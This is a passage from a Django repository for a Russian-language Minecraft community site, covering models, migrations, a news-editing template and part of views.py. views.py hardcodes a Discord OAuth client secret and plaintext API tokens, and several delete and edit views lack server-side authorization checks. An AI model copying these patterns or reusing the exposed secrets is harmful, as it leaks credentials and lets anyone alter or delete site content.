"is_vendor": false, "language": "Python", "length_bytes": 1065, "license_type": "no_license", "max_line_length": 132, "num_lines": 33, "path": "/blog/migrations/0029_auto_20210719_1524.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-19 12:24\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0028_rename_user_id_comment_userid'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='profile',\n name='unconfirmed_discord',\n field=models.CharField(default='Не задан', max_length=100),\n ),\n migrations.AlterField(\n model_name='comment',\n name='userid',\n field=models.CharField(default=3, max_length=1000),\n ),\n migrations.AlterField(\n model_name='profile',\n name='info',\n field=models.TextField(default='Проходивший мимо пользователь сайта,который ничего о себе не написал', max_length=1000),\n ),\n migrations.AlterField(\n model_name='usercomment',\n name='userid',\n field=models.CharField(default=3, max_length=1000),\n ),\n ]\n" }, { "alpha_fraction": 0.5026853084564209, "alphanum_fraction": 0.5370569229125977, "avg_line_length": 33.80769348144531, "blob_id": "fdc320558a46f4a6bcd83aab41830ef7e4a8904b", "content_id": "9a22defc80c561420cd7664212bfe149d2ecb424", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 931, "license_type": "no_license", "max_line_length": 117, "num_lines": 26, "path": "/blog/migrations/0015_city.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-20 17:23\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0014_alter_news_author'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='City',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('image', models.ImageField(upload_to='city/image/')),\r\n ('title', models.CharField(max_length=100)),\r\n ('smol_text', models.TextField(max_length=1000)),\r\n ('text', models.TextField(max_length=100)),\r\n ('contact_url', models.URLField()),\r\n ('active', models.BooleanField(default=True)),\r\n ('author', models.CharField(default='ananist', max_length=100)),\r\n ],\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.512442409992218, "alphanum_fraction": 0.5170506834983826, "avg_line_length": 17.066667556762695, "blob_id": "f82bb3bc25645b2a5c9feafb78c93521f6e8a64f", "content_id": "fc946bcb869575c824fa330ac1f41ff08d3f1406", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1131, "license_type": "no_license", "max_line_length": 105, "num_lines": 60, "path": "/blog/templates/news/edit_news_page.html", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "{% load static %}\n\n\n<!DOCTYPE html>\n\n<html>\n\n\t<head>\n\t\t{% include 'parts_of_page/pages_head.html' %}\n\n\t</head>\n\n\n\t<body>\n\t\t{% if user.username == author or user.profile.admin == True %}\n\n\n\t\t<div class=\"wrapper\">\n\n\t\t\t\t{% include 'parts_of_page/header.html' %}\n\n\t\t\t\t{% include 'parts_of_page/news.html' %}\n\n\t\t\t\t\n\t\t\t\t\t<div class=\"content\">\n\t\t\t\t\t\t<div class=\"profile\">\n\t\t\t\t\t\t\t<form method=\"POST\" enctype=\"multipart/form-data\" class=\"add_something\" style=\"margin-top: 10px\">\n\t\t\t\t\t\t\t\t{% csrf_token %}\n\n\t\t\t\t\t\t\t\t<div class=\"image_div\">\n\t\t\t\t\t\t\t\t\t<img src=\"{{image}}\" width=\"100%\">\n\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t<p>{{ news_form.image }}</p>\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t<p>Заголовок новости:</p>\n\t\t\t\t\t\t\t\t<p>{{ news_form.title }}</p>\n\n\t\t\t\t\t\t\t\t<p>Текст новости:</p>\n\t\t\t\t\t\t\t\t<p>{{ news_form.text }}</p>\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t<button type=\"submit\" class=\"button\" style=\"float: right;\">Сохранить изменения</button>\n\t\t\t\t\t\t\t</form>\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\n\t\t\t\t\t</div>\n\t\t\t\t\n\n\t\t\t\t{% include 'parts_of_page/footer.html' %}\n\n\t\t\t</div>\n\t\t{% else %}\n\t\t\t{% include 'primitive/not_found_page.html' %}\n\t\t{% endif %}\n\n\n\t</body>\n\n</html>\n\n" }, { "alpha_fraction": 0.5347467660903931, "alphanum_fraction": 0.5594817399978638, "avg_line_length": 31.959999084472656, "blob_id": "a55ee17fa6d45a591cdf87bcc71af329821372c4", "content_id": "74c96605a5bb8563377476e240c140a0aab332fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 854, "license_type": "no_license", "max_line_length": 117, "num_lines": 25, "path": "/blog/migrations/0003_users.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-17 17:54\r\n\r\nfrom django.db import migrations, models\r\nimport django.utils.timezone\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0002_news_active'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Users',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('image', models.ImageField(upload_to='users/image/')),\r\n ('username', models.CharField(max_length=50)),\r\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\r\n ('role', models.TextField(default='Игрок')),\r\n ('admin', models.BooleanField(default=False)),\r\n ],\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.4564755856990814, "alphanum_fraction": 0.522292971611023, "avg_line_length": 20.428571701049805, "blob_id": "aeed1f9dc657dec60b51860b4a31084077743368", "content_id": "e8d7fa2dd367db8640d191fbdae14746ad2dd4b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/blog/migrations/0005_auto_20210617_2127.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-17 18:27\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0004_auto_20210617_2123'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterModelOptions(\r\n name='users',\r\n options={'ordering': ('create_date',)},\r\n ),\r\n migrations.RemoveField(\r\n model_name='users',\r\n name='image',\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.6212681531906128, "alphanum_fraction": 0.6421666145324707, "avg_line_length": 31.023473739624023, "blob_id": "40c24463d2d8f2a3f53a0d286dec87abaa2bd494", "content_id": "6778456b0bbed388c4b9c3f4e6eebdbae40d39fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7390, "license_type": "no_license", "max_line_length": 79, "num_lines": 213, "path": "/blog/models.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "from django.db import models\r\nfrom django.utils import timezone\r\nfrom django.contrib.auth.models import User\r\nfrom django.db.models.signals import post_save\r\nfrom django.dispatch import receiver\r\nfrom multiselectfield import MultiSelectField\r\n\r\nclass News(models.Model):\r\n image = models.ImageField(\r\n upload_to='news/image/',\r\n height_field=None,\r\n width_field=None,\r\n max_length=100\r\n )\r\n title = models.CharField(max_length=1000)\r\n text = models.TextField()\r\n create_date = models.DateTimeField(default=timezone.now)\r\n pyblished_date = models.DateTimeField(null=True, blank=True)\r\n active = models.BooleanField(default=True)\r\n author = models.CharField(max_length=100, default=\"ananist\")\r\n\r\n def publish(self):\r\n self.publish_date = timezone.now()\r\n\r\n\r\nclass NewsComment(models.Model):\r\n news = models.ForeignKey(\r\n News, related_name='comments', on_delete=models.CASCADE\r\n )\r\n image = models.CharField(max_length=300, default=\"none\")\r\n name = models.CharField(max_length=100)\r\n userid = models.CharField(max_length=1000, default=3)\r\n role = models.CharField(max_length=100, default=\"Игрок\")\r\n body = models.TextField()\r\n created = models.DateTimeField(default=timezone.now)\r\n active = models.BooleanField(default=True)\r\n\r\n class Meta:\r\n ordering = ('created',)\r\n\r\n\r\nclass Article(models.Model):\r\n image = models.ImageField(\r\n upload_to='article/image/',\r\n height_field=None,\r\n width_field=None,\r\n max_length=100\r\n )\r\n title = models.CharField(max_length=1000)\r\n text = models.TextField()\r\n create_date = models.DateTimeField(default=timezone.now)\r\n active = models.BooleanField(default=True)\r\n author = models.CharField(max_length=100, default=\"ananist\")\r\n\r\n\r\n\r\nclass ArticleComment(models.Model):\r\n article = models.ForeignKey(\r\n Article, related_name='comments', on_delete=models.CASCADE\r\n )\r\n image = models.CharField(max_length=300, default=\"none\")\r\n name = models.CharField(max_length=100)\r\n userid = models.CharField(max_length=1000, default=3)\r\n role = models.CharField(max_length=100, default=\"Игрок\")\r\n body = models.TextField()\r\n created = models.DateTimeField(default=timezone.now)\r\n active = models.BooleanField(default=True)\r\n\r\n class Meta:\r\n ordering = ('created',)\r\n\r\nclass UserComment(models.Model):\r\n user = models.ForeignKey(\r\n User, related_name='comments', on_delete=models.CASCADE\r\n )\r\n image = models.CharField(max_length=300, default=\"none\")\r\n name = models.CharField(max_length=100)\r\n userid = models.CharField(max_length=1000, default=3)\r\n role = models.CharField(max_length=100, default=\"Игрок\")\r\n body = models.TextField()\r\n created = models.DateTimeField(default=timezone.now)\r\n active = models.BooleanField(default=True)\r\n\r\n class Meta:\r\n ordering = ('created',)\r\n\r\n\r\nclass Profile(models.Model):\r\n role1 = 'Игрок'\r\n role2 = 'Журналист'\r\n role3 = 'Мэр'\r\n role4 = 'Представитель города'\r\n role5 = 'ФБР'\r\n role6 = 'Глава ФБР'\r\n ROLES = [\r\n (role1, 'Игрок'),\r\n (role2, 'Журналист'),\r\n (role3, 'Мэр'),\r\n (role4, 'Представитель города'),\r\n (role5, 'ФБР'),\r\n (role6, 'Глава ФБР'),\r\n ]\r\n\r\n user = models.OneToOneField(User, on_delete=models.CASCADE)\r\n user_image = models.ImageField(\r\n upload_to='users/user_image/',\r\n default=\"users/user_image/default/default.png\",\r\n blank=True\r\n )\r\n\r\n info = models.TextField(\r\n default='Проходивший мимо пользователь сайта,'\r\n 'который ничего о себе не написал',\r\n max_length=1000\r\n )\r\n\r\n create_date = models.DateTimeField(default=timezone.now)\r\n role = MultiSelectField(choices=ROLES, default=role1)\r\n unconfirmed_discord = models.CharField(max_length=100, default=\"Не задан\")\r\n unconfirmed_discord = models.CharField(max_length=100, default=\"Не задан\")\r\n admin = models.BooleanField(default=False)\r\n registered = models.BooleanField(default=False)\r\n\r\n\r\n@receiver(post_save, sender=User)\r\ndef create_user_profile(sender, instance, created, **kwargs):\r\n if created:\r\n Profile.objects.create(user=instance)\r\n\r\n\r\n@receiver(post_save, sender=User)\r\ndef save_user_profile(sender, instance, **kwargs):\r\n instance.profile.save()\r\n\r\n\r\nclass City(models.Model):\r\n status1 = 'Открыт'\r\n status2 = 'Закрыт'\r\n status3 = 'Не функционирует'\r\n STATUS = [\r\n (status1, 'Открыт'),\r\n (status2, 'Закрыт'),\r\n (status3, 'Не функционирует'),\r\n ]\r\n\r\n image = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image2 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image1 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image3 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image4 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n image5 = models.ImageField(\r\n default=\"city/image/default/default.png\",\r\n upload_to='city/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n\r\n title = models.CharField(max_length=100)\r\n smol_text = models.TextField(\r\n max_length=400,\r\n default=\"Информация от мэра города не поступила.\"\r\n )\r\n text = models.TextField(\r\n default=\"Информация от мэра города не поступила.\"\r\n )\r\n status = models.CharField(max_length=17, choices=STATUS, default=status1)\r\n contact_url = models.URLField()\r\n active = models.BooleanField(default=True)\r\n author = models.CharField(max_length=100, default=\"ananist\")\r\n mayor = models.CharField(max_length=100, default=\"ananist\")\r\n\r\n\r\nclass Penetration(models.Model):\r\n minecraft_nickname = models.CharField(max_length=100, default=\"Не указано\")\r\n site_username = models.CharField(max_length=100, default=\"Не указано\")\r\n donation_username = models.CharField(max_length=100, default=\"Не указано\")\r\n free_token = models.CharField(max_length=300, default=\"Не указано\")\r\n donation_image = models.ImageField(\r\n default=\"penetration/image/default/default.png\",\r\n upload_to='penetration/image/',\r\n max_length=100,\r\n blank=True\r\n )\r\n description_yourself = models.TextField(default=\"Не описано.\")\r\n how_you_know = models.TextField(default=\"Не описано.\")\r\n contact = models.CharField(max_length=200)\r\n status = models.BooleanField(default=False)\r\n create_date = models.DateTimeField(default=timezone.now)\r\n" }, { "alpha_fraction": 0.4552631676197052, "alphanum_fraction": 0.5368421077728271, "avg_line_length": 19.11111068725586, "blob_id": "e3cc646283957cbaf20221359106cc106f74e1dd", "content_id": "7e58f9396967906e4b52ef288a92f7ccb922731d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "no_license", "max_line_length": 47, "num_lines": 18, "path": "/blog/migrations/0028_rename_user_id_comment_userid.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-23 08:10\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0027_auto_20210623_1040'),\r\n ]\r\n\r\n operations = [\r\n migrations.RenameField(\r\n model_name='comment',\r\n old_name='user_id',\r\n new_name='userid',\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5263158082962036, "alphanum_fraction": 0.5666666626930237, "avg_line_length": 23.782608032226562, "blob_id": "f2b5bc79ea0570db1f54510f75d9cb1f96f19d7d", "content_id": "9ccdf55cc4a24fe4fbc460011777d43d93de83eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 69, "num_lines": 23, "path": "/blog/migrations/0032_auto_20210720_2050.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 17:50\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0031_city_status'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='profile',\n name='favorite_fruit',\n field=models.CharField(default='ананас', max_length=128),\n ),\n migrations.AlterField(\n model_name='profile',\n name='role',\n field=models.CharField(default='Игрок', max_length=9),\n ),\n ]\n" }, { "alpha_fraction": 0.5515424609184265, "alphanum_fraction": 0.5563127398490906, "avg_line_length": 29.194602966308594, "blob_id": "362859aac7f8fd6b32eaecf5b144c2b22164c2be", "content_id": "2fa2e2c352e7a1e981f2aa3299dae86c199ac206", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39113, "license_type": "no_license", "max_line_length": 81, "num_lines": 1223, "path": "/blog/views.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, get_object_or_404, redirect\r\nfrom .models import (\r\n News,\r\n Article,\r\n Profile,\r\n City,\r\n Penetration,\r\n NewsComment,\r\n UserComment,\r\n ArticleComment\r\n)\r\nfrom .forms import (\r\n UserForm,\r\n ProfileForm,\r\n ChangeProfileRoleForm,\r\n Add_nuwsForm,\r\n AddArticleForm,\r\n Add_citeForm,\r\n PenetrationForm,\r\n EditPenetrationForm,\r\n NewsCommentForm,\r\n UserCommentForm,\r\n ArticleCommentForm,\r\n DeleteNewsCommentForm,\r\n DeleteUserCommentForm,\r\n EditNewsCommentForm,\r\n DeleteArticleCommentForm,\r\n EditArticleCommentForm,\r\n DeleteNewsForm,\r\n DeleteArticleForm,\r\n DeleteCityForm,\r\n)\r\nfrom django.core.paginator import Paginator\r\nfrom django.contrib.auth.models import User\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom django.contrib.auth import login, logout, authenticate\r\nfrom django.contrib.auth.forms import AuthenticationForm\r\nfrom PIL import Image\r\nfrom django.http import JsonResponse\r\nimport json\r\nimport requests\r\n\r\nAPI_TOKENS = [\r\n \"5uT8TgYv8g\",\r\n \"sGX3oeicfX\",\r\n \"Poh45c27NE\",\r\n \"Nq6Ffwjg0f\",\r\n \"sfc1Z5XhRx\",\r\n \"nBMzRUopIl\"\r\n]\r\n\r\n\r\ndef get_info(request): # Функция для получение информации\r\n islogin = request.user.is_authenticated # залогинен ли вользователь\r\n header_img, style_file = get_style(request) # узнаём какая должна быть\r\n news = get_news(request) # достаём новости для сайд бара\r\n return(islogin, header_img, style_file, news)\r\n\r\n\r\ndef discord(request): # Функция коннекта к ДСу\r\n code = request.GET.get(\"code\")\r\n data = {\r\n \"client_id\": \"623940461412876288\",\r\n \"client_secret\": \"x9XwSpBw7DEDtngEo4XAwWncAfYHvN9Y\",\r\n \"grant_type\": \"authentication_code\",\r\n \"code\": code,\r\n #\"redirect_url\": \"http://mmarupik.pythonanywhere.com\",\r\n #\"scope\": \"idendifity\"\r\n }\r\n r = requests.post(\r\n \"https://discord.com/api/oauth2/token\",\r\n data=data,\r\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}\r\n )\r\n return(JsonResponse(r.json()))\r\n\r\n\r\ndef api(request): # Функция для бота посути\r\n if(\"token\" in request.headers): # Проверка токена\r\n if(request.headers[\"Token\"] not in API_TOKENS):\r\n return(JsonResponse({\"error\": \"403\"}))\r\n else:\r\n return(JsonResponse(\r\n {\r\n \"error\":\r\n {\r\n \"code\": \"403\",\r\n \"details\": \"Wrong token\"\r\n }\r\n }\r\n ))\r\n if(request.headers[\"Rtype\"] == \"get\"): # Бот хочет получить данные?\r\n result = {'news': [], 'users': [], \"citys\": [], \"error\": {\"code\": 200}}\r\n obj_news = get_news(request)\r\n for i in obj_news: # Новости\r\n result['news'].append(\r\n {\r\n \"title\": i.title,\r\n \"text\": i.text,\r\n \"comments\": [\r\n {\r\n \"name\": comment.name,\r\n \"userid\": comment.userid,\r\n \"text\": comment.body # Коментарии\r\n } for comment in i.comments.filter(active=True)\r\n ]\r\n }\r\n )\r\n for i in Profile.objects.all(): # Профили\r\n result['users'].append(\r\n {\r\n \"username\": i.user.username,\r\n \"info\": i.info,\r\n \"role\": i.role,\r\n \"isAdmin\": i.admin,\r\n # \"discord\": i.discord\r\n }\r\n )\r\n for i in City.objects.all(): # Города\r\n result[\"citys\"].append(\r\n {\r\n \"title\": i.title,\r\n \"smol_text\": i.smol_text,\r\n \"text\": i.text,\r\n \"author\": i.author,\r\n \"mayor\": i.mayor\r\n }\r\n )\r\n return(JsonResponse(result))\r\n\r\n elif(request.headers[\"Rtype\"] == \"post\"): # Бот хочет добавить данные?\r\n if(\"Add-discord\" in request.headers): # Данные о ДС\r\n json_data = json.loads(request.headers[\"Add-discord\"])\r\n username = json_data[\"username\"]\r\n discord_id = json_data[\"discord_id\"]\r\n user = User.objects.get(username=username)\r\n profile = Profile.objects.get(user=user)\r\n if(profile is not None): # Если профиль существет то присваиваем.\r\n profile.discord = discord_id # см models.py 88-89\r\n else:\r\n return(JsonResponse(\r\n {\r\n \"error\":\r\n {\r\n \"code\": 404,\r\n \"details\": \"Profile not found.\"\r\n }\r\n }))\r\n return(JsonResponse(\r\n {\r\n \"error\":\r\n {\r\n \"code\": 404,\r\n \"details\": \"Command not found.\"\r\n }\r\n }))\r\n\r\n\r\ndef get_client_ip(request): # берём ip юзера\r\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\r\n if x_forwarded_for:\r\n ip = x_forwarded_for.split(',')[0]\r\n else:\r\n ip = request.META.get('REMOTE_ADDR')\r\n return ip\r\n\r\n\r\ndef get_news(request): # достаём список новостей из бд, для сайд бара\r\n res = News.objects.all() # достаём все обьекты новостей\r\n res = res.filter(active=True) # отбрасываем неактивные\r\n res = list(reversed(res)) # переворачиваем список, что бы новые шли первее\r\n page_obj = [res[0], res[1], res[2]] # отбераем три новейшие\r\n return page_obj # возвращаем новости для дальнейшего использования\r\n\r\n\r\ndef get_style(request): # изменение темы\r\n img = 'image/logo.png' # расположение логотипа сайта в директории static\r\n if('theme' in request.COOKIES): # если в куки есть тема\r\n file = request.COOKIES['theme'] # записываем расположение файла темы\r\n else:\r\n file = 'css/purple_gold.css' # иначе записываем стандартную тему\r\n return(img, file) # возвращаем расположение файлов\r\n\r\n\r\n# Обычные\r\ndef show_main(request): # отображение главной страницы\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if('main_image' in request.COOKIES):\r\n main_image = request.COOKIES['main_image']\r\n else:\r\n main_image = 'image/main2.png' \r\n\r\n context = { # контекст для шаблона\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file,\r\n 'main_image': main_image,\r\n }\r\n return render(\r\n request,\r\n 'primitive/main_page.html',\r\n context\r\n ) # отображение шаблона\r\n\r\n\r\ndef show_map(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'primitive/map_page.html', context)\r\n\r\n\r\ndef show_info(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'primitive/info_page.html', context)\r\n\r\n\r\ndef register(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n err = ''\r\n if(request.method == \"POST\"):\r\n user_form = UserCreationForm(request.POST)\r\n if user_form.is_valid():\r\n user = user_form.save()\r\n login(request, user)\r\n return redirect(\"/marupik/main\")\r\n else:\r\n err = user_form.errors.as_data()\r\n else:\r\n user_form = UserCreationForm()\r\n\r\n err = str(err).split(\"'\")\r\n error = []\r\n for i in err:\r\n res = i.split(\".\")\r\n for ii in res:\r\n if ii == '':\r\n error.append(i)\r\n\r\n context = {\r\n 'newses': news,\r\n 'error': error,\r\n 'islogin': islogin,\r\n 'user_form': user_form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'primitive/register_page.html', context)\r\n\r\n\r\ndef logout_user(request):\r\n logout(request)\r\n return redirect(\"/marupik/main\")\r\n\r\n\r\ndef login_user(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n err = ''\r\n if request.method == 'POST':\r\n form = AuthenticationForm(request, data=request.POST)\r\n if form.is_valid():\r\n username = form.cleaned_data.get('username')\r\n password = form.cleaned_data.get('password')\r\n user = authenticate(username=username, password=password)\r\n if user is not None:\r\n login(request, user)\r\n return redirect('/marupik/main')\r\n else:\r\n err = \"Пользователь с таким именем не существует\"\r\n else:\r\n err = \"Не верно указаны логин или пароль\"\r\n\r\n form = AuthenticationForm()\r\n context = {\r\n 'newses': news,\r\n 'error': err,\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'primitive/login_page.html', context)\r\n\r\n\r\ndef all_profile(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n users = User.objects.all()\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'users': users,\r\n 'header_img': header_img,\r\n 'style_file': style_file,\r\n }\r\n\r\n return render(request, 'primitive/all_profile_page.html', context)\r\n\r\n\r\n# Новости\r\ndef show_news(request):\r\n islogin = request.user.is_authenticated # залогинен ли вользователь\r\n header_img, style_file = get_style(request) # узнаём какая тема\r\n\r\n res = News.objects.all()\r\n res = res.filter(active=True)\r\n res = list(reversed(res))\r\n paginator = Paginator(res, 3)\r\n page_num = request.GET.get('page')\r\n news = paginator.get_page(page_num)\r\n\r\n context = {\r\n 'newses': news,\r\n 'paginator': paginator,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/news_page.html', context)\r\n\r\n\r\ndef show_one_news(request, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(News, pk=news_id)\r\n news_text = res.text.split(\"\\r\\n\")\r\n user = request.user.username\r\n\r\n comments = res.comments.filter(active=True)\r\n if request.method == 'POST':\r\n comment_form = NewsCommentForm(data=request.POST)\r\n if comment_form.is_valid():\r\n new_comment = comment_form.save(commit=False)\r\n new_comment.name = request.user.username\r\n new_comment.role = request.user.profile.role\r\n new_comment.image = request.user.profile.user_image.url\r\n new_comment.userid = request.user.pk\r\n new_comment.news = res\r\n new_comment.save()\r\n return redirect(f\"/news/{news_id}/\")\r\n else:\r\n comment_form = NewsCommentForm()\r\n\r\n context = {\r\n 'news': res,\r\n 'islogin': islogin,\r\n 'news_text': news_text,\r\n 'user': user,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/one_news_page.html', context)\r\n\r\n\r\ndef delete_news_comment(request, comment_id, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n comment_to_delete = get_object_or_404(NewsComment, id=comment_id)\r\n name = comment_to_delete.name\r\n if request.method == 'POST':\r\n form = DeleteNewsCommentForm(request.POST, instance=comment_to_delete)\r\n\r\n if form.is_valid():\r\n comment_to_delete.delete()\r\n return redirect(f\"/marupik/news/{news_id}/\")\r\n\r\n else:\r\n form = DeleteNewsCommentForm(instance=comment_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/delete_news_comment_page.html', context)\r\n\r\ndef delete_news(request, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n news_to_delete = get_object_or_404(News, id=news_id)\r\n name = news_to_delete.author\r\n if request.method == 'POST':\r\n form = DeleteNewsForm(request.POST, instance=news_to_delete)\r\n\r\n if form.is_valid():\r\n news_to_delete.delete()\r\n return redirect(f\"/marupik/news/\")\r\n\r\n else:\r\n form = DeleteNewsForm(instance=news_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/delete_news_page.html', context)\r\n\r\n\r\n\r\ndef edit_news_comment(request, comment_id, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(News, pk=news_id)\r\n news_text = res.text.split(\"\\r\\n\")\r\n user = request.user.username\r\n\r\n comments = res.comments.filter(active=True)\r\n\r\n comment_to_edit = get_object_or_404(NewsComment, id=comment_id)\r\n if request.method == 'POST':\r\n edit_comment_form = EditNewsCommentForm(\r\n request.POST,\r\n instance=comment_to_edit\r\n )\r\n if edit_comment_form.is_valid():\r\n edit_comment_form.save()\r\n return redirect(f\"/marupik/news/{news_id}/\")\r\n else:\r\n err = edit_comment_form.errors.as_data()\r\n print(err)\r\n else:\r\n comment_form = NewsCommentForm()\r\n edit_comment_form = EditNewsCommentForm(instance=comment_to_edit)\r\n\r\n context = {\r\n 'news': res,\r\n 'islogin': islogin,\r\n 'news_text': news_text,\r\n 'user': user,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'edit_comment_form': edit_comment_form,\r\n 'comment_id': comment_id,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/edit_news_comment_page.html', context)\r\n\r\n\r\ndef add_news(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if(request.method == \"POST\"):\r\n news_form = Add_nuwsForm(request.POST, request.FILES)\r\n if(news_form.is_valid()):\r\n new = news_form.save(commit=False)\r\n new.author = request.user.username\r\n new.save()\r\n news_form.save()\r\n return redirect(\"/marupik/news\")\r\n else:\r\n news_form = Add_nuwsForm()\r\n\r\n role = request.user.profile.role\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'news_form': news_form,\r\n 'role': role,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/add_news_page.html', context)\r\n\r\n\r\ndef edit_news(request, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(News, pk=news_id)\r\n\r\n if(request.method == \"POST\"):\r\n news_form = Add_nuwsForm(request.POST, request.FILES, instance=res)\r\n if news_form.is_valid():\r\n news_form.save()\r\n return redirect(\"/marupik/news\")\r\n else:\r\n news_form = Add_nuwsForm(instance=res)\r\n\r\n author = res.author\r\n user = request.user\r\n image = res.image.url\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'news_form': news_form,\r\n 'author': author,\r\n 'user': user,\r\n 'image': image,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/edit_news_page.html', context)\r\n\r\n# Статьи\r\ndef show_articles(request):\r\n islogin = request.user.is_authenticated # залогинен ли пользователь\r\n header_img, style_file = get_style(request) # узнаём какая тема\r\n\r\n res = Article.objects.all()\r\n res = 